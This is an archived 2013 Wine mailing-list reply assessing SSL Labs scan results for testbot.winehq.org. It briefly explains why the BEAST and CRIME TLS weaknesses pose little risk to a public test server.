[website] Are we doing something wrong with our secure connections?
Juan Lang
juan.lang at gmail.com
Wed Jan 2 13:49:31 CST 2013
Hi André,
On Wed, Jan 2, 2013 at 8:08 AM, André Hentschel <nerv at dawncrow.de> wrote:
> Hi,
> FWIW i have just seen:
>
>
> https://www.ssllabs.com/ssltest/analyze.html?d=testbot.winehq.org&hideResults=on
>
> https://www.ssllabs.com/ssltest/analyze.html?d=test.winehq.org&hideResults=on
>
> https://www.ssllabs.com/ssltest/analyze.html?d=winehq.org&hideResults=on&ignoreMismatch=on
>
> which tells me we have some problems with secure website connection, the
> question is, do we need more security here?
>
The answer is, no.
More reasoning: in general, I don't think we're relying on any
confidentiality in the patches we submit to testbot: anyone can connect and
see the patches, as well as their test results. So no, I don't think
problems with TLS on testbot are a concern, now or ever.
And in particular: the qualsys scan tells us that the cert we're using is
vulnerable to the BEAST attack, and that the server is vulnerable to the
CRIME attack. The BEAST and CRIME attacks can allow an attacker to learn
the plaintext of a stable piece of ciphertext sent in many connections,
e.g. an authentication cookie, without having learned the server's private
key. In testbot's case, we do use cookie-based authentication after initial
login, but at worst that'd allow an attacker to submit jobs as one of us
developers, or cancel one of our test jobs, change our password, etc. I
don't think this is much of a concern.
--Juan
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://www.winehq.org/pipermail/wine-devel/attachments/20130102/9bcef11a/attachment.html>
More information about the wine-devel
mailing list